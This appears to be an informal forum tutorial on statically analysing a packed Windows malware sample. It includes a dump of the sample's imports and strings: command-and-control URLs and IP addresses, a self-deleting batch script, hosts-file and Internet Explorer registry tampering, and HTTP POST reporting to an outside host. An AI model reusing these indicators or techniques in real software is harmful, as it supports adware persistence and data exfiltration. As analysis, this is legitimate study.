ok when dealing with malwares one doesnt start out debugging it one atleast would have a cursory glance statically before proceeding to load it in debugger else some clever little tricks may simply trick you into falling for the baits
those who prefer to use thier favourite hexeditor or lordpe or whatever are free to use them
unzip the attachment (use a virtual machine to follow dont use your production machine to follow unless you are absolutely sure you can deal with consequnces successfully )
what do you notice (if you are familiar already with pe header formats it doesnt look like a normal pe header so you can be sure that this is not a normal binary it could be packed crypted obfuscated whatever
so no point loading it directly in a debugger lets poke around a little bit more
lets find the entry point and see if we could deciper some more things before taking the plunge
ok we see te section headers we see its virtual address is 24000 at pointer to raw size is 200 and address of entry point is 27462
we pore over the diassembly and all we see are few calls and short jumps within viewable distances only one jump in there that sticks out like a sore thumb
from the jump can you really identify the oep ?? just with basic information and the opcodes ??
you havent yet loaded it in debugger or a real disassembler that would make your life little easier but you can still be about 99.9% sure about the oep you would decipher at this stage
some of the imports it resolves and some strings generated after unpacking are like this what do you find if you hunt down information on the urls ?
Code:
77D40000 Module C:\WINDOWS\system32\user32.dll
0042750B COND: ReleaseDC
0042750B COND: GlobalFree
0042750B COND: GlobalLock
0042750B COND: GlobalUnlock
0042750B COND: LocalAlloc
0042750B COND: LocalFree
0042750B COND: MultiByteToWideChar
0042750B COND: ReadFile
0042750B COND: SetEndOfFile
0042750B COND: SetFilePointer
0042750B COND: Sleep
0042750B COND: WideCharToMultiByte
0042750B COND: WinExec
0042750B COND: WriteFile
0042750B COND: lstrcatA
0042750B COND: lstrcmpA
0042750B COND: lstrcmpiA
0042750B COND: lstrcpyA
0042750B COND: lstrcpynA
0042750B COND: lstrlenA
0042750B COND: GlobalAlloc
0042750B COND: GetVersionExA
0042750B COND: GetTickCount
0042750B COND: GetTempPathA
0042750B COND: GetSystemDirectoryA
0042750B COND: GetModuleFileNameA
0042750B COND: GetCurrentProcess
0042750B COND: CloseHandle
0042750B COND: HeapFree
0042750B COND: HeapAlloc
0042750B COND: GetProcessHeap
0042750B COND: GetFileSize
0042750B COND: CopyFileA
0042750B COND: CreateFileA
0042750B COND: DeleteFileA
0042750B COND: ExitProcess
77F10000 Module C:\WINDOWS\system32\GDI32.dll
77DD0000 Module C:\WINDOWS\system32\advapi32.dll
0042750B COND: OpenProcessToken
0042750B COND: LookupPrivilegeValueA
0042750B COND: RegCloseKey
0042750B COND: RegOpenKeyExA
0042750B COND: RegSetValueExA
0042750B COND: AdjustTokenPrivileges
77E70000 Module C:\WINDOWS\system32\RPCRT4.dll
771B0000 Module C:\WINDOWS\system32\wininet.dll
77C10000 Module C:\WINDOWS\system32\msvcrt.dll
77F60000 Module C:\WINDOWS\system32\SHLWAPI.dll
77A80000 Module C:\WINDOWS\system32\CRYPT32.dll
77B20000 Module C:\WINDOWS\system32\MSASN1.dll
77120000 Module C:\WINDOWS\system32\OLEAUT32.dll
774E0000 Module C:\WINDOWS\system32\ole32.dll
773D0000 Module C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9\comctl32.dll
0042750B COND: InternetCloseHandle
0042750B COND: HttpSendRequestA
0042750B COND: HttpOpenRequestA
0042750B COND: FindNextUrlCacheEntryA
0042750B COND: FindFirstUrlCacheEntryA
0042750B COND: DeleteUrlCacheEntryA
0042750B COND: InternetConnectA
77260000 Module C:\WINDOWS\system32\urlmon.dll
0042750B COND: URLDownloadToFileA
77C00000 Module C:\WINDOWS\system32\VERSION.dll
7C9C0000 Module C:\WINDOWS\system32\shell32.dll
0042750B COND: ShellExecuteA
0042750B COND: GetTextExtentPoint32A
0042750B COND: GetObjectA
0042750B COND: DeleteObject
0042750B COND: PatBlt
0042750B COND: CreateFontA
0042750B COND: CreateCompatibleDC
0042750B COND: CreateCompatibleBitmap
0042750B COND: SelectObject
0042750B COND: StretchBlt
0042750B COND: TextOutA
0042750B COND: CreateDIBitmap
0042750B COND: CreateDIBSection
0042750B COND: DeleteDC
0042750B COND: OleInitialize
0042750B COND: OleUninitialize
0042750B COND: CoCreateInstance
0042750B COND: VariantInit
0042750B COND: SysFreeString
0042750B COND: SysAllocString
Text strings referenced in 47547792:
Address Disassembly Text string
00401000 PUSH EBP (Initial CPU selection)
0040121F PUSH 47547792.00408C3D ASCII "complete"
0040125F PUSH 47547792.00408C48 ASCII "interactive"
0040127C PUSH 47547792.00408C54 ASCII "HL_"
00401281 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
0040128D PUSH 47547792.00408C58 ASCII "HD_"
00401292 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004012A9 PUSH 47547792.00408C5C ASCII "DO_"
004012AE PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004012BA PUSH 47547792.00408C60 ASCII "IW_"
004012BF PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004013FC PUSH 47547792.00408C64 ASCII "7search.com/scripts/security/validate.asp"
00401479 PUSH 47547792.00408C94 ASCII "http://66.199.179.8/search.php"
0040148D PUSH 47547792.00408CB4 ASCII "http://65.39.170.123/search.php"
004014B8 PUSH 47547792.00408CD4 ASCII "http://66.250.74.152/click_second"
00401781 PUSH 47547792.00408CFC ASCII "NC2_"
00401786 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004017A6 PUSH 47547792.00408D04 ASCII "NW_"
004017AB PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004017CE PUSH 47547792.0040853E ASCII "winlogon.exe"
004017F0 PUSH 47547792.0040853E ASCII "winlogon.exe"
0040184C PUSH 47547792.0040854B ASCII "%d.%d-"
00401863 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401878 PUSH 47547792.004084EB ASCII "no"
0040187D PUSH 47547792.004084E2 ASCII "PopupMgr"
00401882 PUSH 47547792.00408487 ASCII "Software\Microsoft\Internet Explorer\New Windows"
00401891 PUSH 47547792.004084EB ASCII "no"
00401896 PUSH 47547792.004084F2 ASCII "Display Inline Images"
0040189B PUSH 47547792.004084B8 ASCII "Software\Microsoft\Internet Explorer\Main"
004018AA PUSH 47547792.004084EB ASCII "no"
004018AF PUSH 47547792.00408508 ASCII "Display Inline Videos"
004018B4 PUSH 47547792.004084B8 ASCII "Software\Microsoft\Internet Explorer\Main"
004018DE PUSH 47547792.00408AF1 ASCII "Regsvr32.exe /s shdocvw.dll"
004019B1 PUSH 47547792.00408D08 ASCII "&er["
004019B6 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004019C5 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004019CF PUSH 47547792.00408D10 ASCII "]="
004019D4 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401A19 PUSH 47547792.00408D14 ASCII "SW_"
00401A1E PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401A4C PUSH 47547792.00408D18 ASCII "RB_"
00401A51 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401A6A PUSH 47547792.00408552 ASCII "ghdfggf6j.tmp"
00401A82 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401D9C PUSH 47547792.00408D1C ASCII "DC_"
00401DA1 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401E06 PUSH 47547792.00408D20 ASCII "NL_"
00401E0B PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401E28 PUSH 47547792.00408D24 ASCII "EC_"
00401E2D PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401E40 PUSH 47547792.00408D28 ASCII "NC_"
00401E45 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401E65 PUSH 47547792.00408D2C ASCII "OW_"
00401E6A PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401EC7 PUSH 47547792.00408D30 ASCII "testovaya hren"
0040200B PUSH 47547792.004085B8 ASCII "Suurch
findnseek
shopzil
www.suurch.com
"
00402078 PUSH 47547792.00408566 ASCII "add to card
checkout
continue shopping
download
submit
click here
cart
"
00402223 PUSH 47547792.00408D40 ASCII "Im_"
00402228 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402284 PUSH 47547792.00408D44 ASCII "Lim_"
00402289 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004022BC PUSH 47547792.00408D4C ASCII "Tc_"
004022C1 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004022D0 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004023C9 PUSH 47547792.00408D50 ASCII "Mc_"
004023CE PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004023F5 PUSH 47547792.00408D54 ASCII "Lp_"
004023FA PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402634 PUSH 47547792.00408D5C ASCII "value=no_spyware"
004026EA PUSH 47547792.00408D70 ASCII "f1"
0040271B PUSH 47547792.00408D74 ASCII "f3"
00402752 PUSH 47547792.00408D78 ASCII "None"
00402765 PUSH 47547792.00408D80 ASCII "none"
0040283E PUSH 47547792.00408D88 ASCII "FC_"
00402843 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004029F7 PUSH 47547792.00408D8C ASCII "Im_"
004029FC PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402A44 PUSH 47547792.00408D90 ASCII "66.250.74.152/kw_img/img_gen.php"
00402BB4 PUSH 47547792.00408DB4 ASCII "Im_"
00402BB9 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402C6D PUSH 47547792.00408DBC ASCII "Tc_"
00402C72 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402C81 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402D78 PUSH 47547792.00408DC0 ASCII "Mc_"
00402D7D PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402F06 PUSH 47547792.00408DC4 ASCII "fc"
00402F0B PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
0040304D PUSH 47547792.00408DC8 ASCII "ac"
00403052 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00403176 PUSH 47547792.00408DCC ASCII "rc"
0040317B PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00403414 PUSH 47547792.00408DD0 ASCII "BODY_"
00403419 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00403568 PUSH 47547792.00408443 ASCII "grdsfsd.bat"
00403598 PUSH 47547792.0040844F ASCII ":gl234sh
del %1
if exist %1 goto gl234sh
del %0"
004035AB PUSH 47547792.0040844F ASCII ":gl234sh
del %1
if exist %1 goto gl234sh
del %0"
004035C8 ASCII ""%s"",0
004035D2 PUSH 47547792.004035C8 ASCII ""%s""
004035F3 PUSH 47547792.00408482 ASCII "open"
00403759 PUSH 47547792.004085E7 ASCII "\drivers\etc\hosts"
004038DF PUSH 47547792.00408DD8 ASCII "text="
004038F7 PUSH 47547792.00408DE0 ASCII "&url="
00403911 ASCII "Content-Type: ap"
00403921 ASCII "plication/x-www-"
00403931 ASCII "form-urlencoded",0
0040394A PUSH 47547792.00408DE8 ASCII "MyAgent"
0040396B PUSH 47547792.00408428 ASCII "greeng.biz"
00403989 PUSH 47547792.00408437 ASCII "ht/post.php"
0040398E PUSH 47547792.00408DF0 ASCII "POST"
004039B0 PUSH 47547792.00403911 ASCII "Content-Type: application/x-www-form-urlencoded"
00403A4D PUSH 47547792.00408DF8 ASCII "Shell DocObject View"
00403A61 PUSH 47547792.00408E0D ASCII "Internet Explorer_Server"
00403CA5 MOV EDI, 47547792.0040863A ASCII "Arial"
00403D89 PUSH 47547792.00408E26 ASCII "%ld_%ld_%ld"
00403DA4 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004042E2 PUSH 47547792.00408E34 ASCII "%lX.png"
00404473 PUSH 47547792.00408E3C ASCII "RZ_"
00404478 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004044CE PUSH 47547792.00408E40 ASCII "Arial"
004045BD PUSH 47547792.00408E48 ASCII "%lX.png"
004048EC PUSH 47547792.00408560 ASCII "-%lX-"
00404907 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00404931 PUSH 47547792.00408ADD ASCII "SeShutdownPrivilege"
00408000 ASCII "http://greeng.bi"
00408010 ASCII "z:2080/rd/rep.ph"
00408020 ASCII "p?er[0]=",0
00408428 ASCII "greeng.biz",0
00408437 ASCII "ht/post.php",0
00408443 ASCII "grdsfsd.bat",0
0040844F ASCII ":gl234sh
del %1"
0040845F ASCII "
if exist %1 go"
0040846F ASCII "to gl234sh
del "
0040847F ASCII "%0",0
00408482 ASCII "open",0
00408487 ASCII "Software\Microso"
00408497 ASCII "ft\Internet Expl"
004084A7 ASCII "orer\New Windows"
004084B7 ASCII 0
004084B8 ASCII "Software\Microso"
004084C8 ASCII "ft\Internet Expl"
004084D8 ASCII "orer\Main",0
004084E2 ASCII "PopupMgr",0
004084EB ASCII "no",0
004084EE ASCII "yes",0
004084F2 ASCII "Display Inline I"
00408502 ASCII "mages",0
00408508 ASCII "Display Inline V"
00408518 ASCII "ideos",0
0040853E ASCII "winlogon.exe",0
0040854B ASCII "%d.%d-",0
00408552 ASCII "ghdfggf6j.tmp",0
00408560 ASCII "-%lX-",0
00408566 ASCII "add to card
che"
00408576 ASCII "ckout
continue "
00408586 ASCII "shopping
downlo"
00408596 ASCII "ad
submit
clic"
004085A6 ASCII "k here
cart
",0
004085B8 ASCII "Suurch
findnsee"
004085C8 ASCII "k
shopzil
www."
004085D8 ASCII "suurch.com
",0
004085E7 ASCII "\drivers\etc\hos"
004085F7 ASCII "ts",0
004085FA ASCII "ABCDEFGHIJKLMNOP"
0040860A ASCII "QRSTUVWXYZabcdef"
0040861A ASCII "ghijklmnopqrstuv"
0040862A ASCII "wxyz0123456789+_"
0040863A ASCII "Arial",0
00408640 ASCII "Century Gothic",0
0040864F ASCII "Haettenschweiler"
0040865F ASCII 0
00408660 ASCII "Times New Roman",0
00408670 ASCII "MS Sans Serif",0
0040867E ASCII "AvantGarde Bk BT"
0040868E ASCII 0
0040868F ASCII "Comic Sans MS",0
0040869D ASCII "Courier New",0
00408ADD ASCII "SeShutdownPrivil"
00408AED ASCII "ege",0
00408AF1 ASCII "Regsvr32.exe /s "
00408B01 ASCII "shdocvw.dll",0
00408C3D ASCII "complete",0
00408C48 ASCII "interactive",0
00408C54 ASCII "HL_",0
00408C58 ASCII "HD_",0
00408C5C ASCII "DO_",0
00408C60 ASCII "IW_",0
00408C83 ASCII "lidate.asp",0
00408C94 ASCII "http://66.199.17"
00408CA4 ASCII "9.8/search.php",0
00408CB4 ASCII "http://65.39.170"
00408CC4 ASCII ".123/search.php",0
00408CD4 ASCII "http://66.250.74"
00408CE4 ASCII ".152/click_secon"
00408CF4 ASCII "d",0
00408CFC ASCII "NC2_",0
00408D04 ASCII "NW_",0
00408D08 ASCII "&er[",0
00408D10 ASCII "]=",0
00408D14 ASCII "SW_",0
00408D18 ASCII "RB_",0
00408D1C ASCII "DC_",0
00408D20 ASCII "NL_",0
00408D24 ASCII "EC_",0
00408D28 ASCII "NC_",0
00408D2C ASCII "OW_",0
00408D30 ASCII "testovaya hren",0
00408D40 ASCII "Im_",0
00408D44 ASCII "Lim_",0
00408D4C ASCII "Tc_",0
00408D50 ASCII "Mc_",0
00408D54 ASCII "Lp_",0
00408D5C ASCII "value=no_spyware"
00408D6C ASCII 0
00408D70 ASCII "f1",0
00408D74 ASCII "f3",0
00408D78 ASCII "None",0
00408D80 ASCII "none",0
00408D88 ASCII "FC_",0
00408D8C ASCII "Im_",0
00408D90 ASCII "66.250.74.152/kw"
00408DA0 ASCII "_img/img_gen.php"
00408DB0 ASCII 0
00408DB4 ASCII "Im_",0
00408DBC ASCII "Tc_",0
00408DC0 ASCII "Mc_",0
00408DC4 ASCII "fc",0
00408DC8 ASCII "ac",0
00408DCC ASCII "rc",0
00408DD0 ASCII "BODY_",0
00408DD8 ASCII "text=",0
00408DE0 ASCII "&url=",0
00408DE8 ASCII "MyAgent",0
00408DF0 ASCII "POST",0
00408DF8 ASCII "Shell DocObject "
00408E08 ASCII "View",0
00408E0D ASCII "Internet Explore"
00408E1D ASCII "r_Server",0
00408E26 ASCII "%ld_%ld_%ld",0
00408E34 ASCII "%lX.png",0
00408E3C ASCII "RZ_",0
00408E40 ASCII "Arial",0
00408E48 ASCII "%lX.png",0